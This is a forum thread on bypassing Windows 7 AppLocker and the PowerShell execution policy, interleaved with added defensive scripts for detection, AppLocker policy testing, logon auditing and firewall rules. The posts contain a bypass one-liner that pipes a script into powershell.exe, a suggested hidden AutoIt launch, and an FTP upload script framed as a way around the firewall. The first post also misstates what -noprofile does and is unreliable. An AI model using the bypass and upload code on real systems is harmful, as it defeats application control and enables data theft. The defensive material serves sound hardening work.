
Thread: Can I bypass Windows 7 AppLocker?

  1. #1
    Join Date: Jan 2012, Posts: 56

    Can I bypass Windows 7 AppLocker?

    We know that PowerShell scripts cannot be executed. Actually, it has execution policies regarding PowerShell scripts. It should be set to Restricted, which implies that no execution of scripts should take place. In order to allow execution you should run PowerShell with administrative privileges and simply modify the execution policy to Unrestricted. You can bypass the policies by using the example mentioned below.
    Code:
    get-content .\dnscrypt-proxy.ps1 | powershell.exe -noprofile
    You have to use the cmdlet Get-Content so that it gets all the content of the script dnscrypt-proxy.ps1.

    After that you have to pipeline the content so that it is passed to powershell.exe. powershell.exe should be running with the parameter -noprofile, which implies that the PowerShell profile should be executed.
    In case AppLocker is not allowing execution of *.ps1 files, the script would run, bypassing PowerShell execution policies and AppLocker. It should bypass SRP as well.
    One will be able to bypass PowerShell execution policies by using administrative privileges, and after that powershell.exe should read as well as execute the script instructions one line after another. I don't think there is a security issue; rather it's a backdoor into PowerShell which allows us to bypass security measures.
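A detection-side check for the launch pattern this post describes, added here as an example (it is not code from the thread). It scores process-creation records for the signs that script text reached powershell.exe through a pipe or standard input rather than from a .ps1 file, and it also covers the GUI-automation launch (AutoIt, AutoHotkey) that a later post in the thread mentions. The field names (Image, CommandLine, ParentImage, ParentCommandLine, ProcessId) are assumed to follow Sysmon Event ID 1, or Security 4688 with command-line auditing; the records at the bottom are constructed for the example.

```powershell
# Added example, not from the thread. Flags powershell.exe launches whose
# command text arrives via a pipe or stdin instead of a .ps1 file.
# Record fields are assumed to follow Sysmon Event ID 1 / Security 4688.

function Test-PipedPowerShellLaunch {
    param([Parameter(Mandatory=$true)] $Record)

    $engines = @('powershell.exe', 'powershell_ise.exe')
    $image   = [System.IO.Path]::GetFileName([string]$Record.Image).ToLower()
    if ($engines -notcontains $image) { return $null }

    $cmd         = [string]$Record.CommandLine
    $parent      = [string]$Record.ParentCommandLine
    $parentImage = [System.IO.Path]::GetFileName([string]$Record.ParentImage).ToLower()
    $reasons     = @()

    # A bare "-" as the final argument (or "-Command -") makes powershell.exe
    # read its commands from standard input: no .ps1 file is ever opened, so
    # script rules have nothing to evaluate.
    if ($cmd -match '\s-(c|command)\s+-\s*$' -or $cmd -match '\s-\s*$') {
        $reasons += 'reads commands from stdin'
    }
    # The launching process feeds file content into powershell.exe through a pipe.
    if ($parent -match '\b(get-content|gc|cat|type)\b.*\|\s*powershell') {
        $reasons += 'parent pipes file content into powershell'
    }
    # powershell.exe started by a GUI-automation host rather than a shell/Explorer.
    if ($parentImage -match '^(autoit|autohotkey)') {
        $reasons += "launched by automation host $parentImage"
    }

    if ($reasons.Count -eq 0) { return $null }
    New-Object PSObject -Property @{
        ProcessId   = $Record.ProcessId
        ParentImage = $parentImage
        CommandLine = $cmd
        Reasons     = ($reasons -join '; ')
    }
}

# Constructed sample records (field names follow Sysmon Event ID 1).
$samples = @(
    (New-Object PSObject -Property @{
        ProcessId = 4120
        Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        CommandLine = 'powershell.exe -noprofile -'
        ParentImage = 'C:\Windows\System32\cmd.exe'
        ParentCommandLine = 'cmd.exe /c type .\dnscrypt-proxy.ps1 | powershell.exe -noprofile -'
    }),
    (New-Object PSObject -Property @{
        ProcessId = 4188
        Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        CommandLine = 'powershell.exe -noprofile'
        ParentImage = 'C:\Users\alice\AppData\Local\Temp\AutoIt3.exe'
        ParentCommandLine = 'AutoIt3.exe gui_script.au3'
    }),
    (New-Object PSObject -Property @{
        ProcessId = 4201
        Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        CommandLine = 'powershell.exe -NoProfile -File C:\Scripts\backup.ps1'
        ParentImage = 'C:\Windows\System32\taskeng.exe'
        ParentCommandLine = 'taskeng.exe {constructed-task-guid}'
    })
)

# The first two records are flagged; the scheduled -File launch is not.
$samples | ForEach-Object { Test-PipedPowerShellLaunch $_ } | Where-Object { $_ } |
    Format-Table ProcessId, ParentImage, Reasons, CommandLine -AutoSize
```

One caveat: when the pipeline is typed inside an already open PowerShell console, both halves of the pipe run in that console and the only new process is `powershell.exe -noprofile`, so the piping leaves no command-line trace. In that case the engine-level logs (module logging, and script block logging on hosts where a newer Windows Management Framework is installed) are the signal, because they record what the engine executed regardless of how the text reached it.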

  2. #2
    Join Date: Jul 2011, Posts: 350

    Re: Can I bypass Windows 7 AppLocker?

    Well, we know that AppLocker allows you to specify which applications can or cannot be run on the network. AppLocker's management tools are optimized for creating an allow list of applications. If an application is not mentioned in the allowed list then it should be blocked by the system. It seems to be quite difficult to create as well as maintain an allow list.
    If you want to block PowerShell using AppLocker then you should add the following rules.

    Executable rules

    You should add the entries mentioned below into the Exceptions tab of the 'Allow Everyone All files located in the Windows folder' rule. This is applicable if you are using the default Windows auto-generated path rules as well as a Deny for Everyone rule. It would also work for you if you want to block the same as administrator of the system.

    Code:
    C:\Windows\System32\*powershell.exe
    C:\Windows\System32\*powershell_ise.exe
    C:\Windows\winsxs\*powershell.exe
    C:\Windows\winsxs\*powershell_ise.exe

    DLL rules

    You should add the following under the Exceptions tab of the Allow Microsoft Windows DLLs rule. The rest would be the same as above.

    Code:
    C:\Windows\winsxs\*powershell_ise.resources.dll
    I am hoping that it would be useful in meeting your requirement.
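A way to verify, rather than assume, that the exception paths above actually deny the PowerShell hosts on a given machine, added as an example (not code from the thread). It uses the AppLocker module that ships with Windows 7 Ultimate/Enterprise (`Get-AppLockerPolicy`, `Test-AppLockerPolicy`) and evaluates the effective policy for the account given in `-User`. One assumption worth stating: on 64-bit Windows there is a second, 32-bit copy of each host under SysWOW64 that a System32-only exception does not cover, so that path is included in the list.

```powershell
# Added example, not from the thread: what does the effective AppLocker policy
# decide for the PowerShell hosts? Requires the AppLocker module (Windows 7
# Ultimate/Enterprise).
Import-Module AppLocker

# Both the 64-bit (System32) and 32-bit (SysWOW64) hosts; the latter is a
# separate binary that a System32-only exception leaves untouched.
$PowerShellHosts = @(
    "$env:SystemRoot\System32\WindowsPowerShell\v1.0\powershell.exe",
    "$env:SystemRoot\System32\WindowsPowerShell\v1.0\powershell_ise.exe",
    "$env:SystemRoot\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
    "$env:SystemRoot\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe"
)

function Get-PowerShellAppLockerDecision {
    param(
        [string[]] $Path = $PowerShellHosts,
        [string]   $User = 'Everyone'   # account name or SID the rules are evaluated for
    )

    # AppLocker only enforces while the Application Identity service is running.
    $appId = Get-Service -Name AppIDSvc -ErrorAction SilentlyContinue
    if (-not $appId -or $appId.Status -ne 'Running') {
        Write-Warning 'Application Identity service (AppIDSvc) is not running; AppLocker rules are not being enforced.'
    }

    # Effective policy = local policy merged with any domain Group Policy.
    $policy   = Get-AppLockerPolicy -Effective
    # Skip paths that do not exist on this machine (e.g. SysWOW64 on 32-bit Windows).
    $existing = $Path | Where-Object { Test-Path -Path $_ }

    Test-AppLockerPolicy -PolicyObject $policy -Path $existing -User $User |
        Select-Object FilePath, PolicyDecision, MatchingRule
}

# A PolicyDecision other than Denied / DeniedByDefault means that host still runs
# for the given user, whatever the exception list looks like.
Get-PowerShellAppLockerDecision | Format-Table -AutoSize
```

Run it once per account type you care about (for example `-User 'S-1-5-32-544'` for Administrators and the default Everyone), since the post's exceptions are attached to the Everyone rule and an administrator-only allow rule would still let the hosts run.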

  3. #3
    Join Date: Jul 2011, Posts: 352

    Re: Can I bypass Windows 7 AppLocker?

    If you are looking to allow a PowerShell script to be executed by creating a hash rule in AppLocker, you will notice that the script should not be allowed to execute in case it has been modified and the hash values do not seem to match. AppLocker does not seem to work in case the script is getting modified.

    Well, we are making use of a default deny policy and outbound control in the firewall. The script should be interacting with the Internet. If you have tried to execute the script by means of standard user rights, there should be some tool coded into a *.ps1 file in the user profile folder: simply hiding the script and making use of a scripting language which allows you to automate GUI input, say AutoIt or AutoHotKey. It would hide everything from your user. It would launch powershell.exe, and the PowerShell window is supposed to be hidden. It would trigger the keyboard and simply write the command get-content .\script_here.ps1 | powershell.exe -noprofile - and press the enter key.

    On the basis of these actions one will be able to bypass the firewall without having a rule. If we consider a script which is interacting with the Internet, it would allow the use of another component which would allow a connection, and it might be abused. A user could manage to get the script to upload files to an FTP server or download.
    The script mentioned below lets you upload a file to an FTP server.
    Code:
    # Local file to upload (placeholder path)
    $FileToUpload = "Path to\powershell.txt"
    # FTP destination; note that the username and password are embedded in the URL
    $ftp = "ftp://username:password@domain.com/pub/incoming/powershell.txt"
    "ftp url: $ftp"   # echoes the URL, credentials included, to the console
    $WebClient = New-Object System.Net.WebClient
    $URI = New-Object System.Uri($ftp)
    $WebClient.UploadFile($URI, $FileToUpload)
    The above mentioned script should be used by powershell.exe, if it is allowed in the firewall, and a keylogger should abuse PowerShell. So in this particular manner AppLocker as well as the firewall.

  4. #4
    Join Date: Aug 2011, Posts: 397

    Re: Can I bypass Windows 7 AppLocker?

    I used to do privilege isolation on my system. I have different standard user accounts which can be used to complete different tasks. I was not able to access the web browser using one of the accounts. In fact there was no profile in the connection device for all the user accounts.
    If I am working in one of the user accounts and I have saved a PowerShell script into the user profile, this particular script should be having security stores and a restricted standard user account. I use the credentials of those accounts, which should be used to initiate DNSCrypt for the rest of the user accounts. By default AppLocker should block it, as there will not be any matching of hashes. But it would work because of the backdoor in PowerShell.

    Code:
    $username = ""
    $password = ""
    $credentials = New-Object System.Management.Automation.PSCredential -ArgumentList @($username,(ConvertTo-SecureString -String $password -AsPlainText -Force))
    Start-Process DVDMaker -WorkingDirectory "C:\Program Files\DVD Maker" -Credential ($credentials)
    The credentials should be stored in a file, which should be created by another script. Now consider that the credentials are secured.

    You are using a user account which does not have access to the Internet. However you will be able to point to the other user account by means of PowerShell. So possibly the user will be able to get access to the Internet and permission to use the web browser.

    Code:
    Start-Process browser -WorkingDirectory "C:\Program Files\browser folder" -Credential ($credentials)

    Now you should save the script, launch PowerShell and execute the following.
    Code:
    get-content .\script.ps1 | powershell.exe -noprofile -
    Now you should open the web browser using the credentials of the other user. This particular user account will be able to get access to the Internet as well as download, since there will not be any desktop privilege isolation; if there is desktop isolation you have to schedule the task.
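Where the cross-account launch above leaves a trace, as an added example (not code from the thread): `Start-Process -Credential` hands the new process to the Secondary Logon service, and Windows records each such explicit-credential logon as Security event 4648, which names the calling process. The check below flags 4648 records raised by a PowerShell host. The records are constructed here with field names following the 4648 EventData schema (SubjectUserName, TargetUserName, ProcessName, and so on); `ConvertFrom-SecurityEvent` shows how to produce the same shape from `Get-WinEvent` output on a live system.

```powershell
# Added example, not from the thread: find Security 4648 (explicit-credential
# logon) records whose calling process is a PowerShell host.

function ConvertFrom-SecurityEvent {
    # Flatten the <EventData><Data Name="..."> elements of an EventLogRecord
    # (as returned by Get-WinEvent) into an object with one property per field.
    param([Parameter(Mandatory=$true)] $Event)
    $xml    = [xml]$Event.ToXml()
    $record = New-Object PSObject
    $record | Add-Member NoteProperty Id $Event.Id
    foreach ($data in $xml.Event.EventData.Data) {
        $record | Add-Member NoteProperty $data.Name $data.'#text'
    }
    $record
}

function Test-PowerShellExplicitLogon {
    param([Parameter(Mandatory=$true)] $Record)
    if ($Record.Id -ne 4648) { return $null }
    $process = [System.IO.Path]::GetFileName([string]$Record.ProcessName).ToLower()
    if ($process -notmatch '^powershell(_ise)?\.exe$') { return $null }
    New-Object PSObject -Property @{
        CallingUser = "$($Record.SubjectDomainName)\$($Record.SubjectUserName)"
        UsedAccount = "$($Record.TargetDomainName)\$($Record.TargetUserName)"
        Process     = $Record.ProcessName
    }
}

# Constructed sample records (field names follow the 4648 EventData schema).
$samples = @(
    (New-Object PSObject -Property @{ Id = 4648
        SubjectDomainName = 'PC1'; SubjectUserName = 'alice'
        TargetDomainName  = 'PC1'; TargetUserName  = 'webuser'
        ProcessName = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' }),
    (New-Object PSObject -Property @{ Id = 4648
        SubjectDomainName = 'PC1'; SubjectUserName = 'alice'
        TargetDomainName  = 'PC1'; TargetUserName  = 'admin'
        ProcessName = 'C:\Windows\System32\runas.exe' })
)

# Only the first record (powershell.exe as the calling process) is reported.
$samples | ForEach-Object { Test-PowerShellExplicitLogon $_ } | Where-Object { $_ } |
    Format-Table CallingUser, UsedAccount, Process -AutoSize

# Live use (not run here):
# Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4648 } |
#     ForEach-Object { Test-PowerShellExplicitLogon (ConvertFrom-SecurityEvent $_) }
```

Two practical notes. The 4648 event needs the Logon audit subcategory enabled to be written at all. And because `-Credential` depends on the Secondary Logon service, a host that does not need runas-style launches can remove this path entirely with `Set-Service -Name seclogon -StartupType Disabled` followed by `Stop-Service seclogon`.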

  5. #5
    Join Date: Jul 2011, Posts: 235

    Re: Can I bypass Windows 7 AppLocker?

    By running Sandboxie you will be able to create a dedicated sandbox for PowerShell. It would force both powershell.exe as well as PowerShell_ISE.exe to run in the sandbox. After that, execution should be allowed in the sandbox.

    Code:
    powershell_blocked.exe and PowerShell_ISE_blocked.exe
    The above mentioned thing would simply terminate powershell.exe and PowerShell_ISE.exe.
    If you are looking to have PowerShell for local tasks then you should create a firewall rule which should prevent powershell.exe from connecting outside unless it is needed. If you are looking to connect out then you have to restrict the same to specific domain names, if the firewall lets you add a domain as well as the desired IP.
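The outbound restriction that this post and the third one describe, written out as Windows 7 `netsh advfirewall` rules issued from PowerShell (an added example, not code from the thread; `New-NetFirewallRule` does not exist on Windows 7). Both the 64-bit and 32-bit hosts are covered. 203.0.113.10 is a documentation address standing in for a destination the script is allowed to reach; the rule names are this example's own.

```powershell
# Added example, not from the thread: outbound firewall rules for the
# PowerShell hosts on Windows 7 via netsh advfirewall. Run elevated.

$PowerShellHosts = @(
    @{ Label = 'powershell.exe x64';     Path = "$env:SystemRoot\System32\WindowsPowerShell\v1.0\powershell.exe" },
    @{ Label = 'powershell_ise.exe x64'; Path = "$env:SystemRoot\System32\WindowsPowerShell\v1.0\powershell_ise.exe" },
    @{ Label = 'powershell.exe x86';     Path = "$env:SystemRoot\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" },
    @{ Label = 'powershell_ise.exe x86'; Path = "$env:SystemRoot\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe" }
)

# Block every outbound connection from the PowerShell hosts (the "prevent
# powershell.exe from connecting outside" case).
function Add-PowerShellOutboundBlockRule {
    foreach ($h in $PowerShellHosts) {
        if (-not (Test-Path $h.Path)) { continue }   # e.g. no SysWOW64 on 32-bit Windows
        $name = "Block outbound - $($h.Label)"
        netsh advfirewall firewall add rule name="$name" dir=out action=block program="$($h.Path)" enable=yes profile=any
    }
}

# Allow the hosts to reach only the listed addresses. Windows Firewall lets
# block rules win over allow rules, so this only restricts anything when the
# profile's default outbound action is Block and no program-wide block rule
# for the same host exists.
function Add-PowerShellOutboundAllowRule {
    param([Parameter(Mandatory=$true)] [string[]] $RemoteIp)   # IPs, subnets or ranges
    $list = $RemoteIp -join ','
    foreach ($h in $PowerShellHosts) {
        if (-not (Test-Path $h.Path)) { continue }
        $name = "Allow outbound to $list - $($h.Label)"
        netsh advfirewall firewall add rule name="$name" dir=out action=allow program="$($h.Path)" remoteip=$list enable=yes profile=any
    }
}

# The "default deny" for outbound traffic on all profiles. Create the allow
# rules other software depends on before switching this on.
function Set-DefaultOutboundBlock {
    netsh advfirewall set allprofiles firewallpolicy blockinbound,blockoutbound
}

# List the rules that mention a PowerShell host (read-only).
function Get-PowerShellFirewallRule {
    netsh advfirewall firewall show rule name=all verbose | Select-String -Pattern 'powershell'
}

# Typical order: Add-PowerShellOutboundAllowRule -RemoteIp '203.0.113.10'
#                Set-DefaultOutboundBlock
# or simply:     Add-PowerShellOutboundBlockRule
Get-PowerShellFirewallRule
```

On the "specific domain names" point: Windows Firewall with Advanced Security rules take IP addresses, subnets and address ranges in `remoteip`, not DNS names, so a destination that changes address has to be tracked by updating the rule.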
